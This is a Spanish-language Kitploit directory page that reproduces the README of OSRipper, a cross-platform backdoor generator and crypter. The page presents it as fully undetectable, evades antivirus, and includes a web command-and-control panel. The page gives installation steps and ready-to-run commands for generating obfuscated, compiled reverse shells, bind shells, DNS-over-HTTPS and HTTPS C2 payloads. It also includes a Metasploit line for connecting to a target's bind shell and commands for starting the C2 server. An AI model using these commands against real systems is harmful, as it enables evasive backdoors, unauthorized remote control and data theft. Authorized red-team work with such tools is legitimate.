Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
OSRipper — Framework de Backdoor y Cifrado multiplataforma que evade AV con una webUI ligera integrada. | Kitploit
Herramientas/GitHubGitHub/noahoksuz/osripper
Frameworks de ExploitsGeneración de PayloadsEvasión de IDS/IPSPost-ExplotaciónPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed Teaming
GitHubnoahoksuz/osripper

OSRipper

Framework de Backdoor y Cifrado multiplataforma que evade AV con una webUI ligera integrada.

Ver Repositorio
3285075hace 7 mesesRevisado por Kitploit
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

OSRipper v0.4.2

Logotipo de OSRipper

CodeFactor Python Version License Platform

Generador y encriptador de payloads multiplataforma avanzado con capacidades FUD

Características • Inicio Rápido • Interfaz Web • Tipos de Payload • Documentación


Resumen

OSRipper es un generador y encriptador de backdoors sofisticado y completamente indetectable (FUD), diseñado para pruebas de penetración autorizadas y operaciones de equipo rojo. Cuenta con técnicas de evasión avanzadas, múltiples tipos de payload y una interfaz C2 moderna basada en web para gestionar sistemas comprometidos.

Aspectos Destacados

  • Completamente Indetectable (FUD) - Técnicas de evasión avanzadas que sortean las soluciones AV modernas
  • Interfaz C2 Basada en Web - Panel de control moderno para gestionar sesiones activas
  • Múltiples Tipos de Payload - Bind shells, reverse shells, DoH C2, HTTPS C2 y más
  • Ofuscación Multicapa - Ofuscación estándar y mejorada con variables aleatorizadas
  • Compilación de Binarios - Compila payloads en ejecutables independientes
  • Comunicaciones Cifradas - Canales C2 SSL/TLS y HTTPS con fijación de certificados
  • Funciones Sigilosas - Detección de VM, anti-debugging, suplantación de procesos

Características

Generación de Payloads

Tipo de PayloadDescripciónCaso de Uso
Bind ShellAbre un puerto en la máquina víctimaAcceso directo cuando las conexiones reversas están bloqueadas
Reverse TCP MeterpreterConexión reversa cifrada con SSL/TLSPruebas de penetración estándar
DNS-over-HTTPS C2Canal C2 sigiloso basado en DoHSortear restricciones de red
HTTPS C2C2 HTTPS con fijación de certificadosCanal C2 seguro y autenticado
Payload por EtapasEntrega web en múltiples etapasDespliegue sigiloso mejorado
Encriptador de Código PersonalizadoOfuscar cualquier script de PythonCifrado de payload personalizado

Técnicas de Evasión

  • Ofuscación Avanzada - Codificación de código multicapa con variables aleatorias
  • Ofuscación Mejorada - Anti-debug, detección de VM, inyección de código basura
  • Detección Anti-VM - Evasión de sandboxes y máquinas virtuales
  • Demoras Sigilosas - Retardos aleatorios al inicio (5-15 segundos)
  • Suplantación de Procesos - Disfrazarse como procesos legítimos del sistema
  • Aleatorización de Firmas - Cada payload es único

Características de la Interfaz Web

  • Panel de Sesiones - Ver todas las sesiones C2 activas
  • Terminal Interactiva - Ejecutar comandos a través de la interfaz web
  • Generador de Payloads - Generar payloads directamente desde la interfaz web
  • Gestión de Sesiones - Ver información del sistema, historial de comandos y gestionar sesiones
  • Actualizaciones en Tiempo Real - Ejecución de comandos y visualización de respuestas en vivo

Capacidades Avanzadas

  • Integración con Ngrok - Creación automática de túneles para IPs dinámicas
  • Fijación de Certificados - C2 HTTPS seguro con validación de certificados
  • Persistencia de Sesiones - Mantener conexiones a través de reinicios
  • Cola de Comandos - Poner en cola comandos para agentes desconectados
  • Análisis de Respuestas - Análisis automático de la salida de comandos

Inicio Rápido

Instalación

# Clonar repositorio
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# Instalar dependencias
pip3 install -r requirements.txt

# Instalar paquete
pip3 install -e .

Importante — ejecute la configuración para características opcionales (ngrok, compilación de binarios):
En muchos sistemas (especialmente Linux con un entorno Python gestionado externamente), debe ejecutar la configuración integrada para que las dependencias opcionales se instalen en el venv propio de OSRipper. Hágalo una vez después de la instalación:

osripper-cli setup

Esto crea ~/.local/share/osripper/venv, instala pyngrok, nuitka y sandboxed allí, y todas las ejecuciones posteriores de osripper / osripper-cli los usarán automáticamente. Sin esto, --ngrok y --compile le pedirán que ejecute la configuración. Use osripper-cli setup --system solo si prefiere una instalación pip de sistema/usuario en lugar del venv.

Uso Básico

Modo Interactivo:

osripper
# o
python3 -m osripper

Línea de Comandos:

# Generar reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# Generar payload DoH C2
osripper-cli doh -d example.com --obfuscate --compile

Interfaz Web:

# Iniciar servidor C2 con interfaz web
python -m osripper.c2.server example.com --port 5000

# Acceder al panel en http://localhost:5000

Interfaz Web

OSRipper incluye una interfaz C2 moderna basada en web para gestionar sistemas comprometidos.

Características

  • Panel de Control - Visión general de todas las sesiones activas
  • Gestión de Sesiones - Ver información del sistema y ejecutar comandos
  • Generador de Payloads - Generar payloads DoH y HTTPS a través de la interfaz web
  • Historial de Comandos - Rastrear todos los comandos ejecutados y sus respuestas
  • Actualizaciones en Tiempo Real - Ejecución de comandos y visualización de respuestas en vivo

Iniciar el Servidor C2

# Uso básico
python -m osripper.c2.server example.com

# Con HTTPS
python -m osripper.c2.server example.com --https

# Puerto personalizado
python -m osripper.c2.server example.com --port 8080

# Con certificado personalizado
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

Acceder a la Interfaz Web

Una vez que el servidor esté en ejecución, acceda al panel en:

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000 (si está habilitado)

Tipos de Payload

1. Bind Shell Backdoor

Abre un puerto en la máquina víctima y espera conexiones.

osripper-cli bind -p 4444 --obfuscate --compile

Conexión:

msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. Reverse TCP Meterpreter

Conexión reversa cifrada con SSL/TLS.

osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-over-HTTPS C2

Canal C2 sigiloso usando el protocolo DNS-over-HTTPS. Sortea muchas restricciones de red.

# Generar payload
osripper-cli doh -d example.com --obfuscate --compile

# Iniciar servidor C2
python -m osripper.c2.server example.com

Características:

  • Comunicación sigilosa basada en DNS
  • Interfaz web para gestión de sesiones
  • Persistencia automática de sesiones
  • Cola de comandos para agentes desconectados

4. HTTPS C2 (Fijación de Certificados)

C2 HTTPS seguro con fijación de certificados para autenticación.

# Generar payload (a través de la interfaz web o CLI)
# Iniciar servidor C2 con HTTPS
python -m osripper.c2.server example.com --https

# Obtener la huella digital del certificado
curl http://localhost:5000/api/cert-fingerprint

Características:

  • Fijación de certificados para seguridad
  • Comunicación HTTPS cifrada
  • Integración con la interfaz web
  • Gestión de sesiones

5. Payload por Etapas

Descargar herramienta